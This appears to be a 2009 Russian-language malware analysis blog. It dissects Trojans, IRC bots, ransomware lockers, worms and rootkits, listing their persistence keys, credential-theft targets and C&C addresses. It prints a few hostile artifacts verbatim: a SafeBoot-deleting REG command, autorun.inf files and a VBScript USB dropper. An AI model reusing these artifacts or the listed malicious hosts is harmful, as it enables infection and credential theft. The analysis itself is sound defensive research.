Research and reversing malware

Backdoor.Win32.IRCBot.gen

noreply@blogger.com (GMax) — Fri, 24 Jul 2009 16:03:00 +0000

Имя файла: msdrv32.exe
Размер: 56.00 Kb
Date/Time Stamp(GMT): 18.07.2009 8:06
www.virustotal.com
www.threatexpert.com
Файл ни чем не обработан. Вначале идет код для определения отладки и запуска под VMware. Затем по несложному алгоритму расшифровываются строки (имена функций). Затем расшифровывается из ресурсов основная программа. Далее запускается процесс explorer.exe производится инжект и запуск.
Размер: 46.50 Kb
Date/Time Stamp(GMT): 18.07.2009 8:06
www.virustotal.com
www.threatexpert.com
Вначале инициализируется импорт. Затем исполняемый файл копируется в “WINDOWS\msdrv32.exe”, устанавливается в автозагрузку через “ SOFTWARE\Microsoft\Windows\CurrentVersion\Run\” и “ SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\” имя ключа “ Microsoft Driver Setup”. Далее в реестр прописывается исключения встроенного фаервола, запускаются два дополнительных потока, просматривающих списки из 258 и 135 соответственно имен файлов, и в случае нахождения процесса завершающие его. Затем бот соединяет с командным центром по протоколу IRC и выполняет задания. Бот умеет сканировать порты, скачивать и запускать программы и свои обновления и т.д. Для получения внешнего IP адреса бот опрашивает один из четырех прокси серверов:
http://www.mcreate.net/cgi-bin/envchk/prxjdg.cgi
http://kuwago.hp.infoseek.co.jp/cgi-bin/nph/prxjdg.cgi
http://www.cooleasy.com/cgi-bin/prxjdg.cgi
http://www.cship.info/cgi-bin/prxjdg.cgi
Командный центр по адресу www.messenger.tinypic.name.

Trojan.Win32.Vaklik.fie

noreply@blogger.com (GMax) — Fri, 17 Jul 2009 15:54:00 +0000

Имя файла: foto20.scr
Размер: 291.50 Kb
Date/Time Stamp(GMT): 31.03.2008 7:46
www.virustotal.com
www.threatexpert.com
Файл обернут криптором с множеством анти-отладочных приемов. Расшифровывает из своего тела 3 файла (svvghost.exe, exploree.exe, shl.exe) и записывает их в папку WINDOWS и запускает.
Имя файла: svvghost.exe
Размер: 98.50 Kb
Date/Time Stamp(GMT): 14.12.2007 10:31
www.virustotal.com
www.threatexpert.com
Программа обработана тем же криптором, что и дропер. Написана на Delphi. Очередная версия трояна вымогателя SMSer. Блокирует загрузку в безопасном режиме командой REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /f.Слово для разблокировки – пользователя.
Имя файла: exploree.exe
Размер: 66.50 Kb
Date/Time Stamp(GMT): 15.06.2008 23:07
www.virustotal.com
www.threatexpert.com
После слоя криптора идет попытка отключить Kaspersky антивирус, эта часть программы называется AVPKill. Троян ищет окна относящиеся к антивирусу и с помощью эмуляции нажатия клавиш закрывает окна с предупреждением и вносит в исключения. Программа рассчитана как на русский, так и английский интерфейс антивируса.
Далее троян собирает пароли от следующих программ:
Bat!
ICQ Mirabilis
R&Q
Trillian
RasPhone
Total Commander
Becky!
Internet Account Manager
CuteFTP
Edialer
Far FTP
Ipswitch
Opera
Firefox
QIP
Thunderbird
Mail.Ru Agent
Eudora
Punto Switcher
Outlook
Gaim
FileZilla
Flash FXP
Windows Live
SmartFTP
CoffeeCup
USDownloader
FTP Commander
Затем собранную информацию отсылает по адресу: www.mriya.net/img/icon/dfFgj5.php Имя файла: shl.exe
Размер: 94.00 Kb
Date/Time Stamp(GMT): 07.06.2009 20:10
www.virustotal.com
www.threatexpert.com
Уже описываемый троян Zevs/Zbot с небольшими изменениями, C&C находится по адресу:
http://b18c.cn/pn/config.bin.

Trojan-Ransom.Win32.SMSer.ee

noreply@blogger.com (GMax) — Sat, 11 Jul 2009 08:33:00 +0000

Имя файла: SiteAccess.dll
Размер: 37.50 Kb
Date/Time Stamp(GMT): 22.06.2009 14:04
www.virustotal.com
Файл обернут слоем краптора. Сначала троян проверяет в адресном пространстве какого процесса он находится, если это не iexplore.exe, opera.exe, firefox.exe, chrome.exe, то троян просто завершает свою работу. Если библиотека загружена в один из перечисленных браузеров, то производится перехват функций для работы по сети: send, recv, WSASend, WSARecv, socket, closesocket, connect, WSAConnect, select. Троян осуществляет подмену выдачи Интернет запросов браузера. Технически это достигается добавлением в код страницы следующего фрейма:
Рекламный банер для показа берется с адреса: http://sex-bot.biz/plugin/showbanners.php.

Trojan.Win32.Agent.cmkg

noreply@blogger.com (GMax) — Fri, 03 Jul 2009 17:44:00 +0000

Имя файла: proquota.exe
Размер: 45.00 Kb
Date/Time Stamp(GMT): 21.01.2006 17:24
http://www.virustotal.com
http://www.threatexpert.com
Файл обработан криптором. Исполнение кода начинается с инициализации импорта, по хешу от имени. Затем идет инициализация констант в зависимости от версии Windows. Строки зашифрованы алгоритмом основанном на xor, каждая строка расшифровывается непосредственно перед использованием, а после вновь зашифровывается. Далее идет процедура поиска сплайсинга некоторых системных функций из kernal32.dll и ntdll.dll и снятия путем сопоставления первых 7 байтов функции в памяти и в файле. Если файл еще не установлен в систему, то производится его установка. Файл копируется в “System32\Wbem\proquota.exe” и ему выставляется время создания идентичное файлу “smss.exe”. Заменяет файл “System32\dllcache\proquota.exe”. Автозагрузка производится через ветку “Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableProfileQuota”.
Затем из тела файла расшифровывается файл (18.55 Кб) и создается дополнительный поток созданного “зомби” процесса “svchost.exe”.
Имя файла: file.exe
Размер: 18.55 Kb
Date/Time Stamp(GMT): 10.06.2009 14:01
http://www.virustotal.com
http://www.threatexpert.com
Файл обработан криптором. В первую очередь расшифровываются строки, затем инициализируется импорт.
Программа занимается тем, что ищет на диске и в реестре логины и пароли в местах, где их обычно хранят программы для работы с FTP. Найденные данные троян отправляет по адресу jarus1.ru.

Email-Worm.Win32.Joleee.asq

noreply@blogger.com (GMax) — Fri, 19 Jun 2009 18:34:00 +0000

Имя файла: load.exe
Размер: 26.00 Kb
Date/Time Stamp(GMT): 26.08.2006 7:01
http://www.virustotal.com/ru/analisis/655e64c9c824c309efeb7a3380967423
http://www.threatexpert.com/report.aspx?md5=ee3e3d66e4c3c7f0b56fe9fac060642f
Одна из первых версий популярного спам бота. Файл обернут слоем криптора/протектора. После расшифровки инициализируются необходимые для работы функции. Далее запускается поток, который устанавливает файл в автозагрузку каждые 5 секунд. Далее запускается еще один поток, который и выполняет основную работу по рассылки писем. Вначале бот соединяется с C&C по адресу: 66.232.126.138/spm/get_id.php скачивает файл и сохраняет его под именем _id.dat. Затем по полученным данным производится рассылка писем.

Trojan.Win32.TDSS.rtf

noreply@blogger.com (GMax) — Sat, 30 May 2009 16:07:00 +0000

Имя файла: ddf5d2d88a541c6f532f4eedf5f399ea.exe
Размер: 124.00 Kb
Date/Time Stamp(GMT): 26.02.2009 9:18
http://www.virustotal.com/ru/analisis/d946e3b4b97996a576a24e7fad2700c3925da98cf9da22bb92bb51a9ff859f62-1243355864
http://www.threatexpert.com/report.aspx?md5=100b5b3f6cfef4c9290a3a7cbd5a58a4
Файл обработан криптором с длинной “лапшой” из прыжков разбавленных мусорными инструкциями. Активно используется выделяемая память для размещения расшифровываемых участков криптора, присутствует антиотладка. Сразу после расшифровки основного тела программы в региональных настройках Windows проверяется страна. Если страна входит в список: Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Russia, Uzbekistan, Ukraine то процесс завершается.

Затем из тела программы расшифровывается новый файл размером 96 Кб, и записывается в папку TEMP. Далее программа копирует библиотеку msvcrt.dll в папку TEMP с рандомным именем (с префиксом UAC), и в точку входа библиотеки записывает 23 байта кода, производящего загрузку вызов функции LoadLibrary, производятся манипуляции с объектом “секция”.
Затем запускается сервис "msiserver" (Windows Installer), в адресном пространстве которого, есть библиотека “dll.dll”, которую программа извлекла в папку TEMP.
Имя файла: UAC4864.tmp
Размер: 96.00 Kb
Date/Time Stamp(GMT): 26.02.2009 9:18
http://www.virustotal.com/ru/analisis/47580d2305e3863c10ef22c9cb3382618df349a5bef3ffb1463b46bde62e389c-1243528604
Программа занимается тем, что загружает и передает управление настоящей библиотеке “msvcrt.dll”. В случае если процесс, в который загружается DLL является “msiexec.exe”, запускается дополнительный поток, который извлекает из тела программ драйвер и устанавливает его в системе.
Имя файла: UACxyxvixki.sys
Размер: 55.50 Kb
Date/Time Stamp(GMT): 26.01.2009 15:08
http://www.virustotal.com/ru/analisis/591602f60c8571f6b2fcb07d24d49829f0fb63caed587c531b9e82b6ee30909b-1243528879
Руткит занимается тем, что скрывает установленные файлы, скрывает сетевые соединения, получает список процессов, убивает процессы, инжектится к процессам.
Извлекает и устанавливает в систему DLL размером 30 Кб.
Имя файла: UACemovmpjw.dll
Размер: 30.00 Kb
Date/Time Stamp(GMT): 26.02.2009 9:18
http://www.virustotal.com/ru/analisis/5567c1c057defe4b12be7d92a284a79502a9322bd4877e1428b4e03d142c7fcf-1243529158
В таблице экспорта библиотека имеет название “tdll.dll” и 31 экспортируемую функцию. Названия функций отражают смысл их действий:
CmdExec
CmdExecAffID
CmdExecBotID
CmdExecBuild
CmdExecSubID
CmdExecType
CmdExecVersion
ConnectionHiddenAdd
CryptKeySet
DisallowedAdd
FileDownload
FileDownloadRandom
FileDownloadRandomUnxor
FileDownloadUnxor
ImpersonateAsInput
InjectorAdd
InjectorSet
Knock
ModuleDownload
ModuleDownloadUnxor
ModuleLoad
ModuleUnload
ModulesVersionLog
ProcessKill
ProcessList
ProcessTrustedAdd
Reboot
RegistryHiddenAdd
SetCmdDelay
SetInputDesktop
SetTimeout
При инициализации библиотеки создаются два потока:
первый следит за обновлениями бота по адресу: https://78.47.100.189/lcc

второй соединятся с командными серверами и выполняет команды
http://trafficstatic.net/banner/crcmds/main
http://trafficstatic.com/banner/crcmds/main
://symupdate2.com/banner/crcmds/main
http://94.142.128.160/banner/crcmds/main

Trojan.Win32.Malware

noreply@blogger.com (GMax) — Fri, 08 May 2009 17:35:00 +0000

Имя файла: msncache.dll
Размер: 51.50 Kb
http://www.virustotal.com/ru/analisis/6f2db4f23932e90a5e4c816f8c10f2e4
Бот работает в качестве сервиса. Написан на Delphi. Не чем не упакован, нет защиты. В первую очередь расшифровываются строки, и инициализируется импорт. Устанавливает себя как сервис. Поддерживает сбор информации, обновление, скачивание и запуск программ. C&C по адресам:
bfkq.com
74.54.201.210
174.133. 72.250
jsactivity.com
74.55.37.210
174.133.126.2

Trojan-Ransom.Win32.SMSer.az

noreply@blogger.com (GMax) — Tue, 05 May 2009 15:21:00 +0000

Имя файла: foto334.scr.exe
Размер: 71.50 Kb 180.00 Kb
Date/Time Stamp(GMT): 09.04.2009 14:48
http://www.virustotal.com/ru/analisis/dc33404760b1ace3ebfc065c766d1169
http://www.threatexpert.com/report.aspx?md5=b7331347c2c797440135b40ed37c335c
Устанавливает и запускает в системе 3 программ.
Имя файла: exploree.exe
Размер: 71.50 Kb
http://www.virustotal.com/ru/analisis/800f91d41cb59071c6882636490342c6
http://www.threatexpert.com/report.aspx?md5=02e4c35d3408466bb3da529c02d0cbcc
Троян Pinch. Ворует пароли от большого числа программ, отправляет по адресу www.absolute-speakers.co.uk

Имя файла: lsaass.exe
Размер: 99.00 Kb
http://www.virustotal.com/ru/analisis/a769c5772c4099e565fea300a33d2158
http://www.threatexpert.com/report.aspx?md5=e23b5e2e4b41d50c4510467323921e03
Троян блокирует работу системы, выводит сообщение с требованием выкупа:

Предусмотрено 6 вариантов текста для отправки СМС: oper, safin, serzh, muzzon, jaxx, tupak. Для разблокировки нужно ввести слово – vash.
Имя файла: tmp365.exe
Размер: 2.00 Kb
Date/Time Stamp(GMT): 08.04.2009 19:42
Написан на ассемблере, запускает поток, который пытается удалить файлы exploree.exe и lsaass.exe, а затем удаляет сам себя.

Trojan-Ransom.Win32.Blocker

noreply@blogger.com (GMax) — Wed, 29 Apr 2009 16:42:00 +0000

Имя файла: xvidDecoder60.exe
Размер: 101.50 Kb
Date/Time Stamp(GMT): 14.04.2009 15:34
http://www.virustotal.com/ru/analisis/26e9e579b640bed619561b23c10ce799
http://www.threatexpert.com/report.aspx?md5=ad2067912176a415afe89e43686507af
Дропер трояна WinLock, извлекает в папку темп файл с рандомным именем и префиксом don. Устанавливает его в автозагрузку, дописав на старте к userinit.exe.
Имя файла: don2.tmp.exe
Размер: 110.50 Kb
Date/Time Stamp(GMT): 14.04.2009 15:34
http://www.virustotal.com/ru/analisis/15168836395103bf6b573acf8bb8fe85
http://www.threatexpert.com/report.aspx?md5=c4d964a404ac82a5f1fa44237fe52f6b
Файл сильно замусорен, очень много лишнего кода. Создает дополнительный десктоп на нем рисует следующею картинку:

Код генерится на основе версии Windows и текущей даты. Если просто нечего не делать, то это спустя пару часов блокировка будет снята, а файл самоудалится. Код для снятия блокировки генерится по формуле:
(((((((X/(2^16))&15)*149)%167)*16+(((X/(2^12))&15)*108)%151)*16+(((X/(2^8))&15)*31)%163)*16+(((X/(2^4))&15)*29)%179)*16+((X&15)*53)%197=
, где X число из текста СМС равено числу текста СМС начиная с 4 символа
Командный центр: f3g3fff3fggff3.com
Имя файла: _don18.exe
Размер: 133.00 Kb
Date/Time Stamp(GMT): 24.04.2009 14:32
http://www.virustotal.com/ru/analisis/dbe138abe259534aa6c3b199156b0faf
http://www.threatexpert.com/report.aspx?md5=ea90969e13d2061054e8dd276720d0d0
Код очень похож на предыдущей экземпляр, похожее окошко:

Код для анлока вычисляется по той же формуле, только X – начиная с третьего символа, по два символа через один (для кода с картинки X=676200). Командный центр: 91.212.132.180

Virus.Win32.Virut.av

noreply@blogger.com (GMax) — Fri, 24 Apr 2009 15:58:00 +0000

Имя файла: NOTEPAD.EXE
Размер: 74.50 Kb
Date/Time Stamp(GMT): 04.08.2004 6:05
http://www.virustotal.com/ru/analisis/40352a18cbc7be8d8c17ef4c670cb7c7
http://www.threatexpert.com/report.aspx?md5=127c54b4211f076ef745788acbd3bdaa
Обычный блокнот заражен вирусом Virut. Размер файла увеличился на 7 Кб. Увеличение за счет расширения последней секции файла, в данном случаи секции ресурсов. Переход на добавленный код сразу на точке входа. Сначала вирус расшифровывает свое тело, затем создает мэпируемую секцию “SectVirtu”, добавляет себе отладочные права, перебирает процессы в системе, затем к пятому по счету процессу (winlogon.exe), мэпируется созданная секция и делает инжект (CreateRemoteThread). В новом потоке производится запись в файл “C:\WINDOWS\system32\DRIVERS\ETC\HOSTS” строки “127.0.0.1 NtKrnlpa.info”. Из ветки “SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer” читает ключ TargetHost. Затем в ветку "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List" добавляется исключение для встроенного фаервола.
Затем идет запрос на командный сервер "proxim.ntkrnlpa.info"

Net-Worm.Win32.Kolabc.gda

noreply@blogger.com (GMax) — Tue, 14 Apr 2009 17:35:00 +0000

Имя файла: unwise_.exe
Размер: 137 Кб
Time/Date Stamp (GMT): 26 марта 2009 г. 06:03:13
http://www.virustotal.com/ru/analisis/a4ec604685deb703f90bcc59cd775a47
http://www.threatexpert.com/report.aspx?md5=bf3e95a24e203f680465e165ba4a02b1
Файл в несколько слоев обернут протекторами: первый не представляет из себя нечего сложного, во втором и третьем применена антиотладка и антидамп. После распаковки оказалось, что программа написана на С++. Качество кода достаточно низкое.
Вначале как всегда инициализация импорта. Затем идут антиотладочные проверки: IsDebuggerPresent, поиск строк VMware в реестре, проверка GetTickCount и т.д., в случаи нахождения чего-либо подозрительного программа самоудаляется с помощью BAT файла. Далее идет странная проверка на хук функции MessageBox, проверяются первые 5 байт этой функции и если это “E8 00 04 00 60” (CALL куда?), то программа зацикливается.

После этого расшифровываются строки, часть строк зашифрована по замысловатому алгоритму, основанному на XOR, а часть с использованием алгоритм BlowFish. Файл копируется в папку FONTS и запускается как служба с именем “Windows Host Controller”. Затем запускается новый поток, который проверяет наличие мютекса "gx000032", если он есть, то система уже инфицирована и процесс завершается. Программа читает ключи из ветки реестра “SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions” и если там есть ключи с именами файлов, то они удаляются. Затем в эту ветку записывается дата и время заражения, и время работы системы. Далее просматриваются и отправляются в командный центр список служб, доступность записи в реестр и общие сетевые ресурсы. Очищается кеш DNS и все журналы событий. Червь правит множество параметров в реестре для своей комфортной работы по сети, включая отключение встроенного бранмауера и проброс портов с помощью программы “netsh.exe”.
Далее начинается непосредственно работа с командным центром. В программу зашит большой список IRC серверов, которые можно использовать для управления ботом:
cx10man.weedns.com
fx010413.whyI.org
gynoman.weedns.com
c010x1.co.cc
commgr.co.cc
g.0x20.biz
telephone.dd.blueline.be
phonewire.dd.blueline.be
phonelogin.dd.blueline.be
ufospace.etowns.net
theforums.bbsindex.com
phonewire.dnip.net
phonelogin.dnip.net
koopa.dnip.net
cx10man.weedns.com
fx010413.whyI.org
gynoman.weedns.com
c010x1.co.cc
commgr.co.cc
g.0x20.biz
telephone.dd.blueline.be
phonewire.dd.blueline.be
phonelogin.dd.blueline.be
ufospace.etowns.net
theforums.bbsindex.com
phonewire.dnip.net
phonelogin.dnip.net
koopa.dnip.net
Интересно, что среди большого количества функций по управлению ботом (апдейт, сбор информации, DoS, заражение USB дисков и т.д.), есть функция самоуничтожения. При запросе информации о версии, бот отправляет: “Built: Mar 26 2009 01:02:59 g.3.2 (g.3.2.3.fp)”.

Worm.Win32.AutoRun.bix

noreply@blogger.com (GMax) — Sat, 11 Apr 2009 08:07:00 +0000

Имя файла: fnexsjs.exe
Размер: 24,6 Кб
http://www.virustotal.com/ru/analisis/366c1b1ad51d3fd7ea8c3109e0e7b8e6
http://www.threatexpert.com/report.aspx?md5=16802528a2e57daa1179c67ad15bd485
Файл упакован Upack. После распаковки размер ~ 150 Кб. Написан на Delphi. Качество кода отвратительное. Файл оказался китайским вирусом, написанным на делфи, логика работы соответствующая… Делает следующие: копирует себя в папки “Common Files\System\” и “Common Files\Microsoft Shared\”, копируется на все диски в качестве autorun(для этого перебирает все буквы), inf файл такого вида:
[AutoRun]
open=fnexsjs.exe
shell\open=ґтїЄ(&O)
shell\open\Command=fnexsjs.exe
shell\open\Default=1
shell\explore=ЧКФґ№ЬАнЖч(&X)
shell\explore\Command=fnexsjs.exe
,отключает показ скрытых файлов, прописывается в автозапуск, отключает некоторые сервисы (wscsvc, helpsvc, wuauserv, SharedAccess), не дает перезагрузится в безопасный режим, по заголовку окна убивает некоторые процессы (диспетчер процессов, IceSword и т.д.), ставит себя отладчиком при старте некоторых файлов (Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\) и еще уйма китайского кода. Возможные китайские названия: "the AV End", "Animal Virus", "the Kind of AV End". Командный центр: www.webweb.com.

Trojan-Downloader.Win32.Injecter.cax

noreply@blogger.com (GMax) — Mon, 30 Mar 2009 16:43:00 +0000

Имя файла: wpv771230262576.cpx.exe
Размер: 80,5 Кб
Time/Date Stamp (GMT): 29 января 2009 г. 13:36:03
http://www.virustotal.com/ru/analisis/1e77cd297ac8179a642d5c3bf6244e6c
Файл запакован UPX. После распаковки 196 Кб. В файл местами добавлен однотипный мусорный код с вызовом API функций. Строки в файле не зашифрованы, а просто разряжены. Каждый символ занимает не 1 или 2 байта, а 4 байта. Далее инициализируется импорт. Из файла завлекается DLL, хранящаяся так же в разряженном виде, и сохраняется в файл "…\system32\crypts.dll". Библиотека ставится в автозагрузку "…\CurrentVersion\Winlogon\Notify\crypt". Затем производится инжект в процесс explorer.exe. В инжектирумом коде происходит общение с командным центром http://af9f330a59.com.

На сервер передается строка, идентифицирующая заращенный компьютер (сетевое имя и серийный номер HDD), причем происходит это с помощью функции UrlDownloadToFile, т.е. ответ сначала сохранятся в файл (папка TEMP), а затем оттуда читается. Мне на запрос пришла строка “0SLP:3600;MOD:dAcbf6;URL:http://hansali4.com/731l2.exe;SRV:stoped;”.
Затем скачивается указанный файл и запускается на исполнение.
Имя файла: crypts.dll
Размер: 31,5 Кб
Time/Date Stamp (GMT): 29 января 2009 г. 13:35:57
http://www.virustotal.com/ru/analisis/01ab49e7f23228d1cc1d359a51a2e4b1
Файл запакован UPX. После распаковки 72 Кб. Полностью повторяется функционал инжектируемого в процесс explorer.exe кода дропера (предыдущий файл).
Имя файла: 731l2.exe
Размер: 71,0 Кб
Time/Date Stamp (GMT): 10 марта 2009 г. 15:42:01
http://www.virustotal.com/ru/analisis/e7f26d770daac1f686fca0a74d371800
Файл запакован UPX. После распаковки 164 Кб. Программа занимается рассылкой спама.
Командные центы расположены по адресам:
https://83.133.127.5/mrl2/,
https://212.117.185.20/ost/i2.php,
https://85.17.168.141/base.php.

Trojan.Win32.Agent.brcu

noreply@blogger.com (GMax) — Tue, 17 Mar 2009 16:58:00 +0000

Имя файла: system.exe
Размер: 56,0 Кб
http://www.virustotal.com/ru/analisis/d3eba3d6f8bbba80c9adf8e799376d76
Файл не чем не запакован, написан на Delphi. Вначале расшифровывает строки, затем инициализирует импорт. В секции ресурсов хранится еще один исполняемый файл. Файл system.exe запускается еще раз с флагом SUSPENDED, затем туда из секции ресурсов копируются данные, изменяется контекст процесса и процесс размораживается.
Размер: 15,5 Кб
Time/Date Stamp (GMT): 15 февраля 2009 г. 15:59:45
http://www.virustotal.com/ru/analisis/481433938bf01a62790bc1328565466a
Файл запакован UPX. После распаковки ~57 Кб. В качестве мютекса (и еще в нескольких местах) используется слово Macrovisions. Далее файл копируется в системную директорию. Переводит системную дату на 01.01.2070г. Добавляет себя в исключения файрвола. Ставит себя на автозагрузку в ветку “…\CurrentVersion\Winlogon” вместе с userinit.exe или, если не получается, в стандартную ветку “…\CurrentVersion\Run”. Затем делается инжект в процесс explorer.exe, в этом потоке проверяем мютекс и при необходимости вновь запускаем процесс (system.exe). Далее (для XP) снимаются хуки с SSDT из Ring3 с помощью NtSystemDebugControl.
Из тела программы извлекается драйвер, записывается в папку TEMP, устанавливается и загружается в систему. Далее запускаются 3 потока: в первом ведется работа с ключами реестра, ставятся нотификаторы на изменение, во втором создается окно, в оконной процедуре которого обрабатывается сообщение о подключении USB диска, с последующим его заражением, в третьем потоке происходит сетевое общение (IRC) с командным центом money.pornoturkiye.com.

Бот умеет скачивать и запускать файлы, оправлять запрашиваемый файл, слать ICMP запросы на какой-либо сайт. Кроме того, бот умеет искать определенные процессы (хеш от имени) и выполнять для них предварительно заложенные действия, а именно добавлять информацию в определенные окна. Причем делать это не традиционным способом, а через буфер обмена.
Размер: 4,0 Кб
Time/Date Stamp (GMT): 13 февраля 2009 г. 4:44:16
http://www.virustotal.com/ru/analisis/9b7b99601348d217574dc85e9f673462
Не чем не обработан, строки зашифрованы. Руткит занимается тем, что ставит хуки на обращение к реестру и фильтрует функции ObReferenceObjectByHandle и IofCallDriver, тем самым, маскируя основную программу.

Worm.Win32.AutoRun.eze

noreply@blogger.com (GMax) — Mon, 09 Mar 2009 11:13:00 +0000

Имя файла: cfixer.exe
Размер: 15,9 Кб
Time/Date Stamp (GMT): 5 декабря 2008 г. 17:30:47
http://www.virustotal.com/ru/analisis/07f1a961237157256252ec471c36790e
Файл почти полностью идентичен Backdoor.Win32.IRCBot.eqq, за сключением нескольких строк (имя файла, адрес C&C, мютекс и т.д.). Адрес командного центра mh.patex.org.

2009, GMax
e_gmax@mail.ru

Backdoor.Win32.IRCBot.eqq

noreply@blogger.com (GMax) — Fri, 06 Mar 2009 13:29:00 +0000

Имя файла: reg32.exe
Размер: 14,7 Кб
Time/Date Stamp (GMT): 26 июля 2008 г. 21:42:44
http://www.virustotal.com/ru/analisis/5f0ca337ff3055ff342a31dacef8bbce
Файл обработан упаковщиком eXPressor v1.4. Программа расшифровывает строки, находит адреса нужных функций и производит запись всего этого в процесс explorer.exe, а затем запускает удаленный поток в этом процессе. Копирует себя в папку C:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\ и тут же создает файл Desktop.ini:
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
Устанавливает себя в автозапуск через ключ реестра HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components.
Ищет USB диски и если находит, то копирует себя также в RECYCLER и устанавливает в автозапуск. В случаи заражения информирует сервер сообщением: "PRIVMSG ##e :Infected usb drive: D:"
Далее соединяется с серверами: shop.hostswiss.com, shop.m-n-g.info, shop.worldadult.biz откуда и производится управление ботом. Умеет скачивать и запускать на исполнение файлы.

2009, GMax
e_gmax@mail.ru

Trojan.Win32.Agent.bsdh

noreply@blogger.com (GMax) — Tue, 03 Mar 2009 16:41:00 +0000

Имя файла: Keygen.Tag.&.Rename.3.4.6.exe
Размер: 28,5 Кб
Time/Date Stamp (GMT): 24 февраля 2009 г. 16:27:33
http://www.virustotal.com/ru/analisis/c37dc61e6001a6c1dd5c8cce5e902489
Файл упакован UPX. Затем идет слой еще одного упаковщика, который выделяет память, расшифровывает туда каждую секцию файла, копирует, настраивает импорт и запускает на исполнение основную программу. Программа собирает различные сведения о системе: версия Windows, версия Internet Explorer, какой антивирус установлен, количество сетевых соединений и т.д. Затем собранные данные шифруются (xor) и кодируются в BASE64 для отправки на адрес:
http://traff.loadmore.eu.

Запускается дополнительно еще один поток, который ждет соединения на 10100 порту. При установлении соединения, если пришло слово ‘PING’, шлет в ответ слово ‘PONG’. Кроме того, программа умеет скачивать в папку TEMP файлы и запускать их на исполнение.
2009, GMax
e_gmax@mail.ru

Backdoor.Win32.Agent.adse

noreply@blogger.com (GMax) — Fri, 27 Feb 2009 17:13:00 +0000

Имя файла: bot.dll
Размер: 59 Кб
http://www.virustotal.com/ru/analisis/5b2d2c83020f9257315c2e8d4e5ce2d5
Более новая версия библиотеки Px.ax из предыдущего поста (Trojan.Win32.Agent.bryp). Вначале идет фейк код из мусорного кода с ложными вызовами API функций. Непосредственно сам рабочий код был значительно увеличен, добавлена поддержка работы в режиме прокси серверов (HTTP и Socks). Бот теперь называется “HTTP/SOCKS Bot v1.8”. Прокси сервера выполнены в виде отдельных потоков. Бот ведет подробный лог своей работы в файле “C:\automate.bin”. Кроме основного C&C сервера –“trafficmonsterinc.ru”, был добавлен еще и дополнительный “controller.505.ru”. Существует еще upload сервер “http://uploasssssd.com”. На сервер отправляется информация о компьютере жертвы, доступных портах, времени пинга, а так же с помощью запросов на сайт www.ip2location.com информация о внешнем IP адресе и стране к которой он относится. Управляется бот с помощью конфига, который скачивает с C&C. Дополнительно скачивает следующие файлы: http://trafficmonsterinc.ru/gg.dll сохраняется под именем “C:\windows\gif32.dll” и загружается, http://trafficmonsterinc.ru/ggg.dll сохраняется под именем “ C:\windows\zavsmob.dll” и устанавливается как BHO.

Имя файла: gg.dll
Размер: 12 Кб
Time/Date Stamp (GMT): 5 февраля 2009 г. 20:31:33
http://www.virustotal.com/ru/analisis/8ff89c052411c8ff1c4c8b48ec24f6c0
Файл упакован UPX. После распаковки ~53 Кб. Скачивает следующие файлы: http://trafficmonsterinc.ru/bot2.exe (разобран в предыдущем посте под именем “12177.exe”) сохраняет под именем “_img358.gif”, http://trafficmonsterinc.ru/folder.ico сохраняет под именем “_img359.gif”. Далее запускается поток, в котором ищутся съемные диски (флешки) и записывается туда файл “autorun.inf” со следующим содержанием:
[autorun]
action=Open folder to view files
icon=folder.ico
shellexecute=system.vbs
LABEL=My Drive
Далее записывается файл “system.vbs”:
On Error Resume Next
Const Hidden = 2
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ".\"
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "system2.exe", "c:\system.exe",TRUE
Set objFile = fso.GetFile("c:\system.exe")
If objFile.Attributes Then
objFile.Attributes = Hidden
End If
WshShell.Run "c:\system.exe"
Сохраняется файл “folder.ico” со скаченной ранее иконкой и непосредственно сам “system2.exe” (скаченный ранее “bot2.exe”). Затем запускается процедура заражения *.exe файлов: сначала ищутся все папки в корне диска, затем процедура повторяется рекурсивно для каждой найденной папки, далее ищутся exe файлы и происходит их заражение. При заражении пропускаются файлы “system2.exe”, “system.exe” и файлы, у которых есть метка зараженности (дворд по смещению -0x90 байт от конца файла равен 0xD97AB8). Из тела программы извлекается файл размером 5,5 Кб и сохраняется под именем заражаемого файла с символом “_” на конце. Этому файлу устанавливается в ресурсы иконка заражаемого файла и ставится атрибут “HIDDEN”. Затем в конец инфицируемого файла дописывается “bot2.exe” каждый байт, которого поксорен константой 0xAA, а затем получившийся файл дописывается в конец файла с символом подчеркивания на конце. Затем файл с подчеркиванием на конце имени и файл заражаемой программы удаляются. В результате получается четырехслойный “бутерброд”: первый слой (5,5 Кб) это программа, извлекающая и расшифровывающая остальные два слоя, сохраняет слои в папку TEMP и запускающая их на выполнение; второй слой это скаченный “bot2.exe” поксоренный константой 0xAA; третий слой это непосредственно сама зараженная программа поксоренная константой 0xAA; четвертый слой это служебная информация размером 0x90 байт (идентификационная константа, размеры каждого слоя и т.д.). Если скачать “bot2.exe” у программы не вышло, то второй слой просто имеет нулевой размер.
Кроме того, заражаются и некоторые программы, если такие есть на компьютере:
eMule
DC++
ApexDC++
Cerberus FTP Server
FileZilla Server
Golden FTP Server
Xlight FTP
и заодно заражает все расшаренные папки и “Documents And Settings” других учетных записей.
Имя файла: ggg.dll
Размер: 22 Кб
Time/Date Stamp (GMT): 4 февраля 2009 г. 21:55:37
http://www.virustotal.com/ru/analisis/ad365f4ff8915057b6c5bc7f8b86c3a3
Файл разбавлен мусором. Вначале расшифровывается основное тело программы (ADVAPI32.CryptDecrypt). Затем еще один слой расшифровки и создание нового потока. В новом потоке устанавливается перехват следующих функций: 'InternetConnectW', 'HttpOpenRequestW', 'InternetConnectA', 'HttpOpenRequestA', 'HttpSendRequestW', 'HttpSendRequestA', 'InternetQueryDataAvailable', 'InternetReadFile', 'InternetCloseHandle', 'ExitProcess', 'FreeLibrary' с последующей фильтрации трафика. Перехват делается только в пределах своего процесса, т.к. библиотека установлена как BHO.
